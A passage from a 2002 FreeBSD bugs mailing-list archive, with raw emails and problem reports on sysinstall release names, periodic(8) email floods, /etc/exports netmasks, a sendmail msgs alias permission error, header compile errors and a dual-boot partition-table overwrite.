Reply-To: From: "Ash Garg" To: "Makoto Matsushita" , Subject: RE: misc/39908: releaseName env variable not reference in install.c Date: Fri, 28 Jun 2002 10:14:23 +1000 Message-ID: MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2911.0) Importance: Normal In-Reply-To: <200206271320.g5RDK0Y1040049@freefall.freebsd.org> X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4807.1700 Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Makoto, As we upgrade out kernels (most recently 4.3 to 4.5) we notice that the Options variable in /stand/sysinstall is set to "4.5-RELEASE-p5" which is not recognised when we try to download packages from our local mirror. We have to change the parameter to "4.5-RELEASE" before it will find the packages. This change is not permanent and needs to be done every time. From my reading of the documentation it seems like the env variable releaseName should allow us to set this parameter. Have I misread something or made a mistake in the upgrade process? Thanks, Ash \\\|||/// \\ ^ ^ // ( 6 6 ) -----------------------------------------oOOo-(_)-oOOo--- Ash Garg 5/490 Northbourne Ave Network Specialist DICKSON 2602 Internet Network Development Telstra Email: BH: +612 6208 1994 Mob: 0408 687 642 Fax: +612 6248 6165 "Only two things are infinite, the universe and human stupidity, and I'm not sure about the former." -Albert Einstein ---------------------------------------------------------- -----Original Message----- From: Makoto Matsushita [mailto:matusita@FreeBSD.org] Sent: Thursday, 27 June 2002 11:20 PM To: ash@telstra.net; matusita@FreeBSD.org; freebsd-bugs@FreeBSD.org; matusita@FreeBSD.org Subject: Re: misc/39908: releaseName env variable not reference in install.c Synopsis: releaseName env variable not reference in install.c State-Changed-From-To: open->feedback State-Changed-By: matusita State-Changed-When: Thu Jun 27 06:18:48 PDT 2002 State-Changed-Why: It seems that the originator misunderstands the behavior of this funciton. Waiting for the feedback. Responsible-Changed-From-To: freebsd-bugs->matusita Responsible-Changed-By: matusita Responsible-Changed-When: Thu Jun 27 06:18:48 PDT 2002 Responsible-Changed-Why: I'll take this one. http://www.freebsd.org/cgi/query-pr.cgi?pr=39908 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Thu Jun 27 18:56:17 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id C3DD637B401; Thu, 27 Jun 2002 18:56:14 -0700 (PDT) Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by mx1.FreeBSD.org (Postfix) with ESMTP id 6B63943D53; Thu, 27 Jun 2002 18:56:14 -0700 (PDT) (envelope-from johan@FreeBSD.org) Received: from freefall.freebsd.org (johan@localhost [127.0.0.1]) by freefall.freebsd.org (8.12.4/8.12.4) with ESMTP id g5S1uEJU082175; Thu, 27 Jun 2002 18:56:14 -0700 (PDT) (envelope-from johan@freefall.freebsd.org) Received: (from johan@localhost) by freefall.freebsd.org (8.12.4/8.12.4/Submit) id g5S1uEWH082171; Thu, 27 Jun 2002 18:56:14 -0700 (PDT) Date: Thu, 27 Jun 2002 18:56:14 -0700 (PDT) From: Johan Karlsson Message-Id: <200206280156.g5S1uEWH082171@freefall.freebsd.org> To: guolin@alexa.com, johan@FreeBSD.org, freebsd-bugs@FreeBSD.org Subject: Re: bin/39941: /usr/sbin/periodic sends thousands of emails Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Synopsis: /usr/sbin/periodic sends thousands of emails State-Changed-From-To: open->closed State-Changed-By: johan State-Changed-When: Thu Jun 27 18:55:48 PDT 2002 State-Changed-Why: Duplicate of PR 39940 http://www.freebsd.org/cgi/query-pr.cgi?pr=39941 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Thu Jun 27 22:29:22 2002 Delivered-To: freebsd-bugs@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 75AF137B406 for ; Thu, 27 Jun 2002 22:29:16 -0700 (PDT) Received: from castle.jp.FreeBSD.org (castle.jp.FreeBSD.org [210.226.20.15]) by mx1.FreeBSD.org (Postfix) with ESMTP id 7BF6B43E06 for ; Thu, 27 Jun 2002 22:29:15 -0700 (PDT) (envelope-from matusita@jp.FreeBSD.org) Received: from localhost (localhost [::1]) by castle.jp.FreeBSD.org (8.11.6+3.4W/8.11.3) with ESMTP/inet6 id g5S5T9n95783; Fri, 28 Jun 2002 14:29:10 +0900 (JST) (envelope-from matusita@jp.FreeBSD.org) Cc: freebsd-bugs@FreeBSD.org In-Reply-To: References: <200206271320.g5RDK0Y1040049@freefall.freebsd.org> X-User-Agent: Mew/1.94.2 XEmacs/21.5 (bamboo) X-FaceAnim: (-O_O-)(O_O- )(_O- )(O- )(- -)( -O)( -O_)( -O_O)(-O_O-) Mime-Version: 1.0 Content-Type: Text/Plain; charset=us-ascii Content-Transfer-Encoding: 7bit X-Dispatcher: imput version 20000228(IM140) Lines: 8 From: Makoto Matsushita To: Ash@telstra.net Subject: RE: misc/39908: releaseName env variable not reference in install.c Date: Fri, 28 Jun 2002 14:28:19 +0900 Message-Id: <20020628142819M.matusita@jp.FreeBSD.org> Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Ash> From my reading of the documentation it seems like the env Ash> variable releaseName should allow us to set this parameter. Would you please show a "it doesn't work" example? -- - Makoto `MAR' Matsushita To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Thu Jun 27 22:55:24 2002 Delivered-To: freebsd-bugs@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 4527337B401 for ; Thu, 27 Jun 2002 22:55:17 -0700 (PDT) Received: from backup.af.speednet.com.au (afgate.speednet.com.au [203.57.65.244]) by mx1.FreeBSD.org (Postfix) with ESMTP id C71F243E06 for ; Thu, 27 Jun 2002 22:55:14 -0700 (PDT) (envelope-from andyf@speednet.com.au) Received: from backup.af.speednet.com.au (andyf@backup.af.speednet.com.au [172.22.2.4]) by backup.af.speednet.com.au (8.11.6/8.11.6) with ESMTP id g5S5sVP33461; Fri, 28 Jun 2002 15:54:44 +1000 (EST) (envelope-from andyf@speednet.com.au) Date: Fri, 28 Jun 2002 15:54:31 +1000 (EST) From: Andy Farkas X-X-Sender: To: Brooks Davis Cc: , Dan Lukes Subject: Re: bin/39868: cleaning sbin/dump code from warnings In-Reply-To: <200206270110.g5R1A4QO001789@freefall.freebsd.org> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Wed, 26 Jun 2002, Brooks Davis wrote: > Thank you for submitting patches to address the warnings in this code. I think what Dan is doing is A Good Thing (tm). > Unfortunatly, you had really bad timing and the code in -current has > changed significantly due to the changes required for UFS2 support. > This means it is unlikely these patches will apply to -current. They > will apply to -stable, but I'm not sure what we want to do about that > given that there won't be significantly development of file system > changes in -stable. > > -- Brooks Surely the work Dan has put into these PR's makes it extremely easy for a committer to review the patches, then commit. Even though RELENG_4 is nearing its end of life and developer and committer time is precious, perhaps if the user community sees results from their work, more contributions will be made. Well done Dan. -- :{ andyf@speednet.com.au Andy Farkas System Administrator Speednet Communications http://www.speednet.com.au/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Fri Jun 28 0:20:21 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 60BAD37B406 for ; Fri, 28 Jun 2002 00:20:14 -0700 (PDT) Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by mx1.FreeBSD.org (Postfix) with ESMTP id 63C3E43E06 for ; Fri, 28 Jun 2002 00:20:08 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: from freefall.freebsd.org (gnats@localhost [127.0.0.1]) by freefall.freebsd.org (8.12.4/8.12.4) with ESMTP id g5S7K3JU051965 for ; Fri, 28 Jun 2002 00:20:03 -0700 (PDT) (envelope-from gnats@freefall.freebsd.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.12.4/8.12.4/Submit) id g5S7K3UN051964; Fri, 28 Jun 2002 00:20:03 -0700 (PDT) Date: Fri, 28 Jun 2002 00:20:03 -0700 (PDT) Message-Id: <200206280720.g5S7K3UN051964@freefall.freebsd.org> To: freebsd-bugs@FreeBSD.org Cc: From: Bruce Evans Subject: Re: bin/39896: netmask 0xffffff00 no longer works in /etc/exports Reply-To: Bruce Evans Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org The following reply was made to PR bin/39896; it has been noted by GNATS. From: Bruce Evans To: "Crist J. Clark" Cc: freebsd-gnats-submit@FreeBSD.ORG Subject: Re: bin/39896: netmask 0xffffff00 no longer works in /etc/exports Date: Fri, 28 Jun 2002 17:11:58 +1000 (EST) On Thu, 27 Jun 2002, Crist J. Clark wrote: > On Thu, Jun 27, 2002 at 11:21:15AM -0700, Jin Guojun[DSD] wrote: > [snip] > > OK, I _can_ reproduce this. There is something really, really wack > going on. This is actually the issue I thought you were refering to > when I first read your PR. > > Your error is here, > > > eubie# echo "/data -network 131.243.2 -mask 255.255.255.0" > /etc/exports > ^ > As I understand inet_network(3), you are refering to the network, > > 131.243.0.2 > > And if you change that to, > > 131.243.2.0 > > Everything in all of your examples should work fine. This should be > trivial to do in your scripting, so I think you have the correction you > need for your problem. The conventions for export(5) are quite different from those of inet_network(3). 131.243.2 means all hosts on the subnetwork 131.243.2. I know very little about this except that the TIRPC changes broke the convention for -network, and rev.1.48 of mountd.c or thereabouts fixed this. I noticed the breakage for -network but didn't noticed any problems for -mask. Bruce To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Fri Jun 28 3:32:58 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 6AB8037B410; Fri, 28 Jun 2002 03:32:52 -0700 (PDT) Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by mx1.FreeBSD.org (Postfix) with ESMTP id C99AB43E09; Fri, 28 Jun 2002 03:32:51 -0700 (PDT) (envelope-from brian@FreeBSD.org) Received: from freefall.freebsd.org (brian@localhost [127.0.0.1]) by freefall.freebsd.org (8.12.4/8.12.4) with ESMTP id g5SAWpJU095427; Fri, 28 Jun 2002 03:32:51 -0700 (PDT) (envelope-from brian@freefall.freebsd.org) Received: (from brian@localhost) by freefall.freebsd.org (8.12.4/8.12.4/Submit) id g5SAWpbm095423; Fri, 28 Jun 2002 03:32:51 -0700 (PDT) Date: Fri, 28 Jun 2002 03:32:51 -0700 (PDT) From: Brian Somers Message-Id: <200206281032.g5SAWpbm095423@freefall.freebsd.org> To: fgasper@uiuc.edu, brian@FreeBSD.org, freebsd-bugs@FreeBSD.org Subject: Re: conf/39618: /etc/security script doesn't return a kernel log message if no dmesg.today Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Synopsis: /etc/security script doesn't return a kernel log message if no dmesg.today State-Changed-From-To: open->closed State-Changed-By: brian State-Changed-When: Fri Jun 28 03:32:37 PDT 2002 State-Changed-Why: Fixed in -current. I'll MFC in 1 week. http://www.freebsd.org/cgi/query-pr.cgi?pr=39618 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Fri Jun 28 3:50:11 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 8CC2437B401 for ; Fri, 28 Jun 2002 03:50:05 -0700 (PDT) Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by mx1.FreeBSD.org (Postfix) with ESMTP id 2D8D743E06 for ; Fri, 28 Jun 2002 03:50:05 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: from freefall.freebsd.org (gnats@localhost [127.0.0.1]) by freefall.freebsd.org (8.12.4/8.12.4) with ESMTP id g5SAo4JU000628 for ; Fri, 28 Jun 2002 03:50:04 -0700 (PDT) (envelope-from gnats@freefall.freebsd.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.12.4/8.12.4/Submit) id g5SAo40M000627; Fri, 28 Jun 2002 03:50:04 -0700 (PDT) Date: Fri, 28 Jun 2002 03:50:04 -0700 (PDT) Message-Id: <200206281050.g5SAo40M000627@freefall.freebsd.org> To: freebsd-bugs@FreeBSD.org Cc: From: Peter Pentchev Subject: Re: bin/39940: /usr/sbin/periodic sends thousands of emails Reply-To: Peter Pentchev Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org The following reply was made to PR bin/39940; it has been noted by GNATS. From: Peter Pentchev To: Guolin Cheng Cc: bug-followup@FreeBSD.org Subject: Re: bin/39940: /usr/sbin/periodic sends thousands of emails Date: Fri, 28 Jun 2002 13:39:54 +0300 On Thu, Jun 27, 2002 at 05:28:21PM -0700, Guolin Cheng wrote: > > >Number: 39940 > >Category: bin > >Synopsis: /usr/sbin/periodic sends thousands of emails > >Originator: Guolin Cheng > >Release: FreeBSD 4.6, but same for all 4.* version > >Organization: > ALexa Internet. Inc. > >Environment: > FreeBSD rontmp.alexa.com 4.6-RELEASE FreeBSD 4.6-RELEASE #0: Fri Jun 21 20:37:42 GMT 2002 root@rontmp.alexa.com:/usr/src/sys/compile/ALEXA i386 > > >Description: > The problems are: > > 1, /usr/sbin/periodic sends tons of email, when running hourly running > scripts whether or not the latter generate outputs. Then email server > will be overwhelmed if we have hundreds or thousands FreeBSD boxes. This can be worked around easily: make your scripts return an appropriate exit code to periodic(8) as described in its manual page; notably, use an exit code of 0 for scripts that produce no output, and set the hourly_show_success variable to 'no' in /etc/periodic.conf. Actually, this is the way it is *designed* to work :) > 2, periodic can not tell normal shell scripts from backup files ended > with '~' and ',' , which are normally created by CVS/RVS/Perforce. it > tries to run all executable files under base directory specified. Uhm.. so.. don't leave any? :) In the case of source-controlled script directories, I usually keep my working copies somewhere else, and use the 'real' scripts dir only as a checked-out copy; since it is never modified, it should never create any conflicts, so no temporary/backup files should ever be created. > 3, the coufiguration file */periodic.conf, which contain variable > definition entries including _{show|output|...}, will confuse > Bourne Shell interpreter when the basedir contains character '.', > which is normal for directory name but not appropriate for shell > variable name substitution. One might argue that this may be solved by the "Don't do that" approach.. An underscore character would serve just as well as a word separator in the directory name. G'luck, Peter -- Peter Pentchev roam@ringlet.net roam@FreeBSD.org PGP key: http://people.FreeBSD.org/~roam/roam.key.asc Key fingerprint FDBA FD79 C26F 3C51 C95E DF9E ED18 B68D 1619 4553 I am the meaning of this sentence. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Fri Jun 28 5:20:28 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id DF90937B400 for ; Fri, 28 Jun 2002 05:20:02 -0700 (PDT) Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by mx1.FreeBSD.org (Postfix) with ESMTP id 2BB1C43E0A for ; Fri, 28 Jun 2002 05:20:02 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: from freefall.freebsd.org (gnats@localhost [127.0.0.1]) by freefall.freebsd.org (8.12.4/8.12.4) with ESMTP id g5SCK2JU022331 for ; Fri, 28 Jun 2002 05:20:02 -0700 (PDT) (envelope-from gnats@freefall.freebsd.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.12.4/8.12.4/Submit) id g5SCK1rd022330; Fri, 28 Jun 2002 05:20:01 -0700 (PDT) Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id BA43D37B400 for ; Fri, 28 Jun 2002 05:15:43 -0700 (PDT) Received: from netherworld.ru (memphis.mephi.ru [194.67.67.234]) by mx1.FreeBSD.org (Postfix) with ESMTP id A426343E06 for ; Fri, 28 Jun 2002 05:15:29 -0700 (PDT) (envelope-from timon@netherworld.ru) Received: from netherworld.ru (localhost [127.0.0.1]) by netherworld.ru (8.12.3/8.12.3) with ESMTP id g5SC81C9049971 for ; Fri, 28 Jun 2002 16:08:01 +0400 (MSD) (envelope-from timon@netherworld.ru) Received: (from timon@localhost) by netherworld.ru (8.12.3/8.12.3/Submit) id g5SC81CR049970; Fri, 28 Jun 2002 16:08:01 +0400 (MSD) Message-Id: <200206281208.g5SC81CR049970@netherworld.ru> Date: Fri, 28 Jun 2002 16:08:01 +0400 (MSD) From: "Artem 'Zazoobr' Ignatjev" Reply-To: "Artem 'Zazoobr' Ignatjev" To: FreeBSD-gnats-submit@FreeBSD.org X-Send-Pr-Version: 3.113 Subject: misc/39951: Sendmail 8.12.3 and `msgs' alias Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org >Number: 39951 >Category: misc >Synopsis: Sendmail 8.12.3 and `msgs' alias >Confidential: no >Severity: non-critical >Priority: medium >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Fri Jun 28 05:20:01 PDT 2002 >Closed-Date: >Last-Modified: >Originator: Artem 'Zazoobr' Ignatjev >Release: FreeBSD 4.6-RELEASE i386 >Organization: NetherWorld Ultima Online Server >Environment: System: FreeBSD netherworld.ru 4.6-RELEASE FreeBSD 4.6-RELEASE #0: Fri Jun 14 12:49:08 MSD 2002 root@netherworld.ru:/usr/obj/usr/src/sys/NETHER i386 >Description: `msgs' (1) alias in aliases(5) file doesn't work. After uncommenting corresponding line in aliases(5) file and rebuilding aliases table, trying mailing to `msgs' user results in error:(see log line) Jun 28 15:45:46 netherworld sm-mta[47911]: g5SBjjC9047909: to="| /usr/bin/msgs -s", ctladdr=msgs@netherworld.ru (26/0), delay=00:00:01, xdelay=00:00:00, mailer=prog, pri=30616, dsn=5.3.0, stat=unknown mailer error 13 Jun 28 15:45:46 netherworld sm-mta[47911]: g5SBjjC9047909: g5SBjkC9047911: DSN: unknown mailer error 13 and following in my mailbox: [skip] ------ Transcript of session follows ----- msgs: /var/msgs/bounds: permission denied >How-To-Repeat: uncomment corresponding line in aliases(5) file, run newaliases, then mail(1) msgs user >Fix: Don't know yet, but: replacing `aliases' command with simple script calling 'id | logger', I've got line in logs: Jun 28 15:52:31 netherworld root: uid=26(mailnull) gid=26(mailnull) groups=26(mailnull) while `ls -la /var/msgs/` tells total 5 drwxr-xr-x 2 daemon wheel 512 28 июн 15:48 . drwxr-xr-x 21 root wheel 512 17 апр 12:21 .. -rw-r--r-- 1 root wheel 57 28 июн 15:48 1 -rw-r--r-- 1 root wheel 54 28 июн 15:48 2 -rw-r--r-- 1 root wheel 4 28 июн 15:48 bounds >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Fri Jun 28 8: 6:41 2002 Delivered-To: freebsd-bugs@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id D032D37B421 for ; Fri, 28 Jun 2002 08:06:04 -0700 (PDT) Received: from prophecy.dyndns.org (ip-63-121-116-224.new-castle.de.fcc.net [63.121.116.224]) by mx1.FreeBSD.org (Postfix) with ESMTP id CA71343E06 for ; Fri, 28 Jun 2002 08:05:58 -0700 (PDT) (envelope-from apeiron@prophecy.dyndns.org) Received: from prophecy.dyndns.org (prophecy.dyndns.org [127.0.0.1]) by prophecy.dyndns.org (8.12.3/8.12.3) with ESMTP id g5SB6qBh027322 for ; Fri, 28 Jun 2002 11:06:52 GMT (envelope-from apeiron@prophecy.dyndns.org) Received: (from apeiron@localhost) by prophecy.dyndns.org (8.12.3/8.12.3/Submit) id g5SB6l7c027321; Fri, 28 Jun 2002 11:06:47 GMT Subject: Syntax errors in netinet6/in6.h and sys/socket.h From: Christopher Nehren To: freebsd-bugs@freebsd.org Content-Type: text/plain Content-Transfer-Encoding: 7bit X-Mailer: Ximian Evolution 1.0.5 Date: 28 Jun 2002 11:06:47 +0000 Message-Id: <1025262407.272.78.camel@prophecy.dyndns.org> Mime-Version: 1.0 Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org >Synopsis: 4.6R has errors in net header files >Confidential: no >Severity: serious >Priority: I'm guessing high, lots of stuff uses socket.h, no? >Responsible: freebsd-bugs >State: open >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Mon Jun 2 14:00:05 PDT 2002 >Last-Modified: >Originator: Chris Nehren >Environment: FreeBSD prophecy.dyndns.org 4.6-RELEASE FreeBSD 4.6-RELEASE #0: Tue Jun 25 11:28:04 GMT 2002 root@prophecy.dyndns.org:/usr/obj/usr/src/sys/PROPHECY i386 >Description: Including and produces syntax errors even with an empty program >How-To-Repeat: Compile the C program that follows: #include #include /* can't include directly */ int main() { return 0; } >Output: --- begin paste --- /usr/include/sys/socket.h:52: syntax error before `sa_family_t' /usr/include/sys/socket.h:52: warning: data definition has no type or storage class /usr/include/sys/socket.h:163: syntax error before `u_char' /usr/include/sys/socket.h:174: syntax error before `u_short' /usr/include/sys/socket.h:188: syntax error before `u_char' /usr/include/sys/socket.h:190: `int64_t' undeclared here (not in a function) /usr/include/sys/socket.h:190: `u_char' undeclared here (not in a function) /usr/include/sys/socket.h:190: size of array `__ss_pad1' is too large /usr/include/sys/socket.h:191: syntax error before `int64_t' /usr/include/sys/socket.h:192: `u_char' undeclared here (not in a function) /usr/include/sys/socket.h:192: `int64_t' undeclared here (not in a function) /usr/include/sys/socket.h:192: `u_char' undeclared here (not in a function) /usr/include/sys/socket.h:192: `int64_t' undeclared here (not in a function) /usr/include/sys/socket.h:359: syntax error before `pid_t' /usr/include/sys/socket.h:364: syntax error before `gid_t' /usr/include/sys/socket.h:399: syntax error before `u_short' /usr/include/sys/socket.h:407: syntax error before `caddr_t' /usr/include/sys/socket.h:411: syntax error before `caddr_t' In file included from smb-method.c:25: /usr/include/sys/socket.h:444: syntax error before `recv' /usr/include/sys/socket.h:444: syntax error before `size_t' /usr/include/sys/socket.h:444: warning: data definition has no type or storage class /usr/include/sys/socket.h:445: syntax error before `recvfrom' /usr/include/sys/socket.h:445: syntax error before `size_t' /usr/include/sys/socket.h:445: warning: data definition has no type or storage class /usr/include/sys/socket.h:446: syntax error before `recvmsg' /usr/include/sys/socket.h:446: warning: data definition has no type or storage class /usr/include/sys/socket.h:447: syntax error before `send' /usr/include/sys/socket.h:447: syntax error before `size_t' /usr/include/sys/socket.h:447: warning: data definition has no type or storage class /usr/include/sys/socket.h:448: syntax error before `sendto' /usr/include/sys/socket.h:449: syntax error before `size_t' /usr/include/sys/socket.h:449: warning: data definition has no type or storage class /usr/include/sys/socket.h:450: syntax error before `sendmsg' /usr/include/sys/socket.h:450: warning: data definition has no type or storage class /usr/include/sys/socket.h:451: syntax error before `off_t' In file included from smb-method.c:26: /usr/include/netinet/in.h:233: syntax error before `in_addr_t' /usr/include/netinet/in.h:285: syntax error before `u_char' In file included from /usr/include/netinet/in.h:467, from smb-method.c:26: /usr/include/netinet6/in6.h:122: syntax error before `u_int8_t' /usr/include/netinet6/in6.h:144: syntax error before `u_int8_t' /usr/include/netinet6/in6.h:149: syntax error before `u_int32_t' /usr/include/netinet6/in6.h:612: syntax error before `*' /usr/include/netinet6/in6.h:614: syntax error before `*' /usr/include/netinet6/in6.h:614: warning: data definition has no type or storage class /usr/include/netinet6/in6.h:615: syntax error before `u_int8_t' /usr/include/netinet6/in6.h:616: syntax error before `u_int8_t' /usr/include/netinet6/in6.h:618: syntax error before `inet6_rthdr_space' /usr/include/netinet6/in6.h:618: warning: data definition has no type or storage class /usr/include/netinet6/in6.h:630: syntax error before `size_t' /usr/include/netinet6/in6.h:631: syntax error before `size_t' /usr/include/netinet6/in6.h:633: syntax error before `size_t' /usr/include/netinet6/in6.h:634: syntax error before `size_t' /usr/include/netinet6/in6.h:636: syntax error before `size_t' /usr/include/netinet6/in6.h:638: syntax error before `size_t' /usr/include/netinet6/in6.h:640: syntax error before `size_t' /usr/include/netinet6/in6.h:641: syntax error before `inet6_rth_space' /usr/include/netinet6/in6.h:641: warning: data definition has no type or storage class --- end paste --- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Fri Jun 28 8:10:18 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 8632C37B407 for ; Fri, 28 Jun 2002 08:10:05 -0700 (PDT) Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by mx1.FreeBSD.org (Postfix) with ESMTP id 780B243E0F for ; Fri, 28 Jun 2002 08:10:03 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: from freefall.freebsd.org (gnats@localhost [127.0.0.1]) by freefall.freebsd.org (8.12.4/8.12.4) with ESMTP id g5SFA3JU059600 for ; Fri, 28 Jun 2002 08:10:03 -0700 (PDT) (envelope-from gnats@freefall.freebsd.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.12.4/8.12.4/Submit) id g5SFA3GX059599; Fri, 28 Jun 2002 08:10:03 -0700 (PDT) Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 0C18437B405 for ; Fri, 28 Jun 2002 08:01:50 -0700 (PDT) Received: from www.freebsd.org (www.FreeBSD.org [216.136.204.117]) by mx1.FreeBSD.org (Postfix) with ESMTP id C8DC743E06 for ; Fri, 28 Jun 2002 08:01:49 -0700 (PDT) (envelope-from nobody@FreeBSD.org) Received: from www.freebsd.org (localhost [127.0.0.1]) by www.freebsd.org (8.12.4/8.12.4) with ESMTP id g5SF1nOT051113 for ; Fri, 28 Jun 2002 08:01:49 -0700 (PDT) (envelope-from nobody@www.freebsd.org) Received: (from nobody@localhost) by www.freebsd.org (8.12.4/8.12.4/Submit) id g5SF1nEH051112; Fri, 28 Jun 2002 08:01:49 -0700 (PDT) Message-Id: <200206281501.g5SF1nEH051112@www.freebsd.org> Date: Fri, 28 Jun 2002 08:01:49 -0700 (PDT) From: John Hawk To: freebsd-gnats-submit@FreeBSD.org X-Send-Pr-Version: www-1.0 Subject: i386/39952: Crashes partiton table Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org >Number: 39952 >Category: i386 >Synopsis: Crashes partiton table >Confidential: no >Severity: critical >Priority: high >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Fri Jun 28 08:10:02 PDT 2002 >Closed-Date: >Last-Modified: >Originator: John Hawk >Release: 4.6 >Organization: >Environment: >Description: Copies partion table form harddisk 0 to hardisk1 (ads's) System and boot: hd0 3.1 G vfat32 (Windows XP) /dev/hda1 6.9 G ext3 (Redhat 7.3) grub on /dev/hda2 hd1 5 G (FreeBSD 4.6) /dev/hdb1 5 G vfat (MSDOS) /dev/hdb2 10 G ext3 (Mandrake 8.2)grub on /dev/hdb6 All items booted from Windows XP BootMgr boot.ini c:\bootsect.os ="Operating System" created via dd if=/dev/drive of=bootsect.os bs=512 count=1 When FreeBSD 4.6 is booted this way it writes the hd1 partition table to hd0 thus crashing all Operating Systems on hd0 >How-To-Repeat: Set up as above stated the boot into FreeBSD >Fix: >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Fri Jun 28 8:10:38 2002 Delivered-To: freebsd-bugs@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 3FF1037B407 for ; Fri, 28 Jun 2002 